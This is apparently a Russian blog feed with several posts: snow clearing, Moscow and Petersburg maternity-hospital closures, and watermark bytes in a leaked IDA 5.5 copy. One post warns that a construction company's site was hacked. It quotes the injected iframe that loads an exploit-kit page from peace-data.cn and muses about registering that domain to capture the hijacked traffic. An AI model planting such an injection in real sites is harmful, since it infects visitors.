Friends

Забавно наблюдать, как некогда четырехполосные дороги, становятся вдруг двухполосными или, в некоторых случаях, даже однополосными (в основном из-за отличной методики уборки снега -- "методика советская", а так же свежеприпаркованных машин).

Не, понятно, осадков много, сложно, да. И даже вроде бы слышал (не смотрел), что ночью там кто-то копался на дороге, скрежетал. Но то, что предстояло увидеть утром... Уж извините. Не, ну реально - совок совком, иначе не назовешь. Просто взять и снег сгрести к краям и тем самым срезав по 1,5-2 ряда... Шутнички. (На всякий случай: куча мест, где нет никаких припаркованных машин, а дорога имеет вот такой вот видок).

Дворик тоже позабавил. Какая там высота поребрика? Сантиметров 20? Над ним еще мини-заборчик такой, ограждающий газон. Это там еще сантиметров 50-60, не меньше. В общем... Ни поребрика, ни заборчика. Над ними еще слой какой-то. Дворик ровный весь. Один снег.

Зиму не люблю. Но детям, которые за последние лет 10 (???) не видели снега на новый год, а видели только дождь или какую-то жижу грязную -- реально повезло. Пусть радуются. Вероятно, кто-то даже впервые увидел, что снега бывает больше, чем 5 см.

P.S. А, еще 2.5 метровые кучи снега (скорее даже - горы) через каждые метров 100-200 - это круто. Тоже изобретение зачетное.

Разбирал почтовый ящик (обычный, который оффлайновый - то есть для бумажной почты и газет). Нашел рекламу некой строительной компании с запоминающимся доменным именем (и одновременно - телефоном) - 6543210.ru. Решил зайти, посмотреть, чем сейчас "спамят" подобные конторы (в интернете подобная информация меня бы не заинтересовала и "искать" подобные сайты не стал бы; а тут - оффлайн реклама).

Пока ползаю по их сайту, смотрю - периодически идут попытки соединения на домен peace-data.cn. Конкретная ссылка - http://peace-data.cn/newyear/index.php. Решил сразу же посмотреть исходный код страницы, которая так настоятельно ссылается на "китайщину". Что же я там увидел?

В каждый документ (страницу) сайта строительной компании вставлено: ( Секретный код )

Этот код расшифровывает и вставляет внутрь документа следующий iframe:
<iframe name="10" id="tovBX" src="http://peace-data.cn/newyear/index.php" class="iCwIc"></iframe>

Ну, понятно, да? Это для всяких любителей теорий "если я не болтаюсь по порно-сайтам и не качаю пиратские программы - где же я заражусь вирусами?".
Да вот где - например, из рекламы в оффлайновом почтовом ящике или по телевизору!      << для тех, кто не понял, суть поста тут
И так же для любителей теорий вида: "Да я за аппаратным роутером! Я защищен!" (в последнее время подобных расплодилось много, даже среди моих знакомых оказались подобные теоретики).

Думаю, с псевдо-китайцами, говорящими по-русски ("peace-data" = "пиздато") компания бизнес не ведет. Тем более, с iframe'ами, подгружающими эксплоиты пользователям, просматривающим страницы компании.

Вариантов тут не очень много - они все уже обыденны. Либо украли пароль у web-master'а (в автоматическом режими украли, в автоматическом режиме все обслуживающиеся ftp и про-iframe'или), либо проломали хостинг и про-iframe'или всех клиентов, до кого дотянулись руки.

Дополнительно подтверждающая информация: http://www.malwareurl.com/listing.php?domain=peace-data.cn
Информация отсюда. Корректно отображаемая (использована связка эксплоитов - YES Exploit).
И еще подтверждение от McAfee (не лучший вариант, но...): http://www.siteadvisor.com/sites/peace-data.cn

А вообще - поиск в google: "peace-data.cn" (в кавычках).

"Сайту" везет лишь в том, что домен peace-data.cn уже прибили. Но постоянные соединения в ту сторону продолжаются. Соответственно, можно даже подсуетиться, зарегистрировать этот домен и получить некое количество трафика на халяву (правда, русского, но зато - "денежного").

P.S. Владелец сайта уведомлен, но я не уверен, что они как-либо отреагируют. Обычно компании подобного рода не реагируют.

Сомалийские пираты, конечно, знатную конвертацию транзитного трафика придумали.

( Вопрос под катом, чтобы не оскорблять эстетические чувства нелюбителей угг. гг. )Заранее спасибо!

Сегодня узнала новое противопоставление двух столиц с лингвистическо-беременного толка.
Кому-то я Америки не открою, но я как-то раньше не сталкивалась.
Оказывается, что в Москве роддома закрываются на мойку, а в Питере - на проветривание. И то, и другое - разговорное обозначение длительной, почти месячной процедуры дезинфекции, которая портит планы тысячам беременных Москвы и Питера (графики ежегодно меняются), но, по счастью, не знакома жителям дальниц заграниц. Еще бы, попробуй закрой на месяц коммерческую клинику. (А еще у нас на тв профилактика на несколько часов ежеквартально - буржуи тоже офигевают).
В больницах все равно живут страшные больничные инфекции, которым что мойка, что проветривание - все монопенисуально и которыми пугают сторонники домашних родов впечатлительных беременных. А они и пугаются. Но речь не о том.

Мне интересно, существую ли традиции моек-проветривания-дезинфекции в странах ближнего зарубежья, и как эта процедура называется там и в других городах России.

По поводу релиза IDA v5.5... См. файлы .\PROCS\*.w32 или *.w64.

В купленной версии (например, можно посмотреть в общедоступной IDA v5.20) в каждом из модулей перед PE-заголовком имеется структура:
<некий dword, вероятно s/n или другая сигнатура - не разбирал>
<массив 16-байт с именем пользователя, совпадающим с IDA.KEY>

Конкретно:
12481806h
"Mach EDV Dienstl" (данные в ключе: "Mach EDV Dienstleistungen, Jan Mach")
дальше - PE-заголовок

В warez'ном релизе IDA v5.5 данные такие:
86B50951h
"Training copy", 00h, 00h, 00h

Словосочетание "Training copy" совсем никого не настораживает?
(Не с какого-нибудь "семинара" или "курса по Reverse Engineering / IDA" это тиснули?)